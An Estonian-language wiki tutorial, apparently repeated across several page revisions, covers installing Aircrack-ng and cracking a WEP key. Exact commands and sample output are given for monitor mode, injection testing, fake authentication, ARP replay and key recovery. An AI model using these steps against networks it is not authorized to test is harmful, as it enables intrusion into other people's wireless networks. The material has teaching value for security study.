Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile''' 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:
-9 - “süstimise” test
-e teddy – raadiovõrgu nimi
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks''' 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:
-c 9 – raadiovõrgu kanal
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga''' 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:
-1 – võlts autentimine
0 – kordusühendus(t)e aeg sekundites
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
Ebaõnnestumise korral on tulemus:
8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis''' 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks''' 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references/>

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:17:21Z

Ktragel: /* Lühikesed tegevussammud */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.
 
 
==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==
 

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi''' 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liidese:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>

Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval '''airmon-ng stop athX''' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile''' 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:
-9 - “süstimise” test
-e teddy – raadiovõrgu nimi
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks''' 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:
-c 9 – raadiovõrgu kanal
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga''' 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:
-1 – võlts autentimine
0 – kordusühendus(t)e aeg sekundites
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
Ebaõnnestumise korral on tulemus:
8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis''' 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks''' 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references/>

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-25T19:16:42Z

Ktragel: /* Versioonide ajalugu */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.
 
 
==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume:
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==
 

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi''' 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liidese:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>

Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval '''airmon-ng stop athX''' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile''' 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:
-9 - “süstimise” test
-e teddy – raadiovõrgu nimi
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks''' 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:
-c 9 – raadiovõrgu kanal
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga''' 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:
-1 – võlts autentimine
0 – kordusühendus(t)e aeg sekundites
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
Ebaõnnestumise korral on tulemus:
8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis''' 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks''' 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
